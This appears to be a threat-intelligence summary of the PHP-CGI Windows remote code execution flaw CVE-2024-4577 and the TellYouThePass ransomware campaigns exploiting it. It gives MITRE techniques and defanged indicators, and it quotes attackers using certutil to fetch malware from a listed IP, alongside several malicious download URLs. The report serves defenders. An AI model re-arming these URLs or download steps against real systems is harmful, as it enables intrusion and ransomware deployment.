Devcore alerts a critical remote code execution flaw in PHP (CVE-2024-4577) affecting all PHP versions 5.x+ on Windows CGI, arising from mishandled character encoding conversions. Bitdefender notes ties to the TellYouThePass ransomware operations, while campaigns show post-exploitation activity such as PowerShell usage, DLL side-loading, and various C2 activities. #TellYouThePass #PowerShell #GoBackdoor #RustTrojan #CobaltStrike #RingQ #CVE-2024-4577
Keypoints
- CVE-2024-4577 is a critical PHP RCE affecting all PHP versions from 5.x onward on Windows CGI.
- The vulnerability stems from mishandled character encoding conversions, particularly the Windows Best-Fit behavior, enabling command execution via simple web requests.
- Public exposure and exploitation surged after disclosure, with hundreds of thousands of potentially vulnerable instances detected by Shodan and Censys data.
- Post-exploitation activity includes disabling security controls, deploying additional malware, credential capture, and remote command-and-control across multiple servers.
- Campaigns have leveraged various toolsets (PowerShell, RingQ, CobaltStrike, Go-based backdoors) and multiple download/loader techniques.
- Mitigations emphasize updating PHP to patched versions, evaluating non-CGI architectures, asset inventory, and interim network/file-based hardening actions.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to trigger RCE via PHP CGI; “attackers can force servers to execute unwanted commands via simple web request.”
- [T1059.003] Windows Command Shell – Attackers used scripts within cmd.exe to download additional malware via certutil.exe; “scripts within cmd.exe to download additional malware via certutil.exe from hxxp://147[.]50[.]253[.]109:35411.”
- [T1055] Process Injection – Sideloaded DLLs injected malicious processes into affected systems that allowed for credential capture and remote command-and-control (C2).
- [T1105] Ingress Tool Transfer – Downloaded additional malware from remote URLs to expand foothold; “download additional malware via certutil.exe from …”
- [T1071.001] Web Protocols – C2 communications and data exfiltration via networked backdoors; “C2 server” communications observed in campaigns.
- [T1003] OS Credential Dumping – Credential capture described as part of post-exploitation activities.
- [T1036] Masquerading – Varied naming conventions for batch, DLL, and EXE files with intentional typos to resemble legitimate system files.
Indicators of Compromise
- [IP Address] External scanning IP – 79.124.49[.]158, 88.218.76[.]13, and other known scanning addresses (e.g., 104.238.183[.]19, 103.142.147[.]47, 146[.]19[.]100[.]7)
- [Hash] File hash – 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3, 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618, and 2 more hashes
- [Domain] Domains – ne.phpbug[.]xyz, cl.php-cgi[.]com/idna, and www[.]eqwedasda[.]xyz
- [URL] Malicious download URLs – hxxp[://]147[.]50[.]253[.]109:35411, hxxp[:]//xss-1253555722[.]cos[.]ap-singapore[.]myqcloud[.]com/win.exe
- [Hash] Additional malware/droppers – 976c81f847ef5d7277abba26f4c2a5811dfd4569ef7ecd2df3f67414331e3e19, b6a77e293a158f046f39ab50f276ef9f
- [URL] Other download sites – hxxp[://]dpp-s3-data[.]s3[.]amazonaws[.]com/tpPNDWqMh5ubw, hxxp[://]buddha-common[.]s3[.]amazonaws[.]com/ybe3cjgot6x2x, hxxp[://]alien-static[.]s3[.]amazonaws[.]com/djwne6au4b0u0
- [Domain] Additional domains – xss-1253555722[.]cos[.]ap-singapore[.]myqcloud[.]com (win.exe), etc.